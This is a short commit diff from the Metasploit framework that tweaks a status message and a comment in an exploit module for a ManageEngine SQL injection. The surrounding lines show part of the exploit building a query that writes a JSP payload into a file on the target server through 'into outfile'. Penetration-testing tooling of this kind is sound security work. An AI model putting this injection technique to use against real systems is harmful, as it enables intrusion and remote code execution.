Final touchup

Author: sinn3r

modules/exploits/multi/http/manageengine_search_sqli.rb

@@ -241,7 +241,7 @@ def inject_exec(out)
 		sqli << (2..28).map {|e| e} * ","
 		sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
 
-		print_status("#{rhost}:#{rport} - Sending JSP payload")
+		print_status("#{rhost}:#{rport} - Trying SQL injection...")
 		sqli_exec(sqli)
 
 		fname = "/#{File.basename(out)}"
@@ -252,10 +252,8 @@ def inject_exec(out)
 	end
 
 
-	#
-	# The server must start first, and then we send the malicious requests
-	#
 	def exploit
+		# This is used to collect files we want to delete later
 		@clean_ups = []
 
 		@my_target = pick_target